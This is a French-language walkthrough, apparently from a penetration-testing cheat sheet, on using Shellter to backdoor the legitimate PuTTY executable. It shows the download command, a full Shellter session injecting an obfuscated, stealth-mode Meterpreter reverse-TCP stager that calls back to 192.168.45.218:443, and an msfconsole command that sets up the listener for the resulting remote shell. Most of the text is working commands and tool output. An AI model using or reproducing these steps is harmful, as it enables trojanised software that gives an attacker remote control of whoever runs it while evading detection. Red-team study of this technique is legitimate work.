Shellter
Shellter permet d’introduire un payload à l’intérieur d’un binaire légitime.
Tip
Ce payload doit être 32bits pour que shellter puisse fonctionner correctement
Par exemple, si nous voulons introduire un meterpreter dans l’exécutable Putty:
wget https://the.earth.li/\~sgtatham/putty/latest/w32/putty.exe
shellter
1010101 01 10 0100110 10 01 11001001 0011101 001001
11 10 01 00 01 01 01 10 11 10
0010011 1110001 11011 11 10 00 10011 011001
11 00 10 01 11 01 11 01 01 11
0010010 11 00 0011010 100111 000111 00 1100011 01 10 v7.2
www.ShellterProject.com Wine Mode
Choose Operation Mode - Auto/Manual (A/M/H): A
PE Target: putty.exe
**********
* Backup *
**********
Backup: A backup of the file was not taken!
If another backup with the same file name, is already located in the
Shellter_Backups directory there is no need to report this issue.
If this is an attempt to add another payload to a previously infected
application by Shellter, then you can continue working with this file.
Otherwise, you should consider taking a copy of the original file from
the backups directory in order to avoid re-using a previously infected
binary.
Shellter Pro supports chaining of multiple payloads in a single injection,
which is a lot more effective than re-infecting the same PE file multiple
times.
Please Report To Author.
Last_Error_Code: 80 || Le fichier existe.
Shellter will now proceed...
********************************
* PE Compatibility Information *
********************************
Minimum Supported Windows OS: 5.1
Note: It refers to the minimum required Windows version for the target
application to run. This information is taken directly from the
PE header and might be not always accurate.
******************
* Packed PE Info *
******************
Status: Possibly Not Packed - The EntryPoint is located in the first section!
***********************
* PE Info Elimination *
***********************
Data: Dll Characteristics (Dynamic ImageBase etc...), Digital Signature.
Status: All related information has been eliminated!
****************
* Tracing Mode *
****************
Status: Tracing has started! Press CTRL+C to interrupt tracing at any time.
Note: In Auto Mode, Shellter will trace a random number of instructions
for a maximum time of approximately 30 seconds in native Windows
hosts and for 60 seconds when used in Wine.
DisASM.dll was created successfully!
Instructions Traced: 131341
Tracing Time Approx: 1.02 mins.
Starting First Stage Filtering...
*************************
* First Stage Filtering *
*************************
Filtering Time Approx: 0.008 mins.
Enable Stealth Mode? (Y/N/H): Y
************
* Payloads *
************
[1] Meterpreter_Reverse_TCP [stager]
[2] Meterpreter_Reverse_HTTP [stager]
[3] Meterpreter_Reverse_HTTPS [stager]
[4] Meterpreter_Bind_TCP [stager]
[5] Shell_Reverse_TCP [stager]
[6] Shell_Bind_TCP [stager]
[7] WinExec
Use a listed payload or custom? (L/C/H): L
Select payload by index: 1
***************************
* meterpreter_reverse_tcp *
***************************
SET LHOST: 192.168.45.218
SET LPORT: 443
****************
* Payload Info *
****************
Payload: meterpreter_reverse_tcp
Size: 281 bytes
Reflective Loader: NO
Encoded-Payload Handling: Enabled
Handler Type: IAT
******************
* Encoding Stage *
******************
Encoding Payload: Done!
****************************
* Assembling Decoder Stage *
****************************
Assembling Decoder: Done!
***********************************
* Binding Decoder & Payload Stage *
***********************************
Status: Obfuscating the Decoder using Thread Context Aware Polymorphic
code, and binding it with the payload.
Please wait...
Binding: Done!
*********************
* IAT Handler Stage *
*********************
Fetching IAT Pointers to Memory Manipulation APIs...
0. VirtualAlloc --> N/A
1. VirtualAllocEx --> N/A
2. VirtualProtect --> N/A
3. VirtualProtectEx --> N/A
4. HeapCreate/HeapAlloc --> N/A
5. LoadLibrary/GetProcAddress --> IAT[4ffe30]/IAT[4ffda8]
6. GetModuleHandle/GetProcAddress --> IAT[4ffd9c]/IAT[4ffda8]
7. CreateFileMapping/MapViewOfFile --> IAT[4ffcdc]/IAT[4ffe50]
Using Method --> 7
***************************
* IAT Handler Obfuscation *
***************************
Status: Binding the IAT Handler with Thread Context Aware Polymorphic code.
Please wait...
Code Generation Time Approx: 0.02 seconds.
*************************
* PolyMorphic Junk Code *
*************************
Type: Engine
Generating: ~572 bytes of PolyMorphic Junk Code
Please wait...
Generated: 576 bytes
Code Generation Time Approx: 0.022 seconds.
Starting Second Stage Filtering...
**************************
* Second Stage Filtering *
**************************
Filtering Time Approx: 0.00117 mins.
*******************
* Injection Stage *
*******************
Virtual Address: 0x4352b0
File Offset: 0x346b0
Section: .text
Adjusting stub pointers to IAT...
Done!
Adjusting Call Instructions Relative Pointers...
Done!
Injection Completed!
*******************
* PE Checksum Fix *
*******************
Status: Valid PE Checksum has been set!
Original Checksum: 0x16c3ef
Computed Checksum: 0x1705ea
**********************
* Verification Stage *
**********************
Info: Shellter will verify that the first instruction of the
injected code will be reached successfully.
If polymorphic code has been added, then the first
instruction refers to that and not to the effective
payload.
Max waiting time: 10 seconds.
Warning!
If the PE target spawns a child process of itself before
reaching the injection point, then the injected code will
be executed in that process. In that case Shellter won't
have any control over it during this test.
You know what you are doing, right? ;o)
Injection: Verified!
Press [Enter] to continue...Il suffit ensuite de démarrer un meterpreter et d’attendre l’exécution de notre binaire :
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.45.218;set LPORT 443;run;"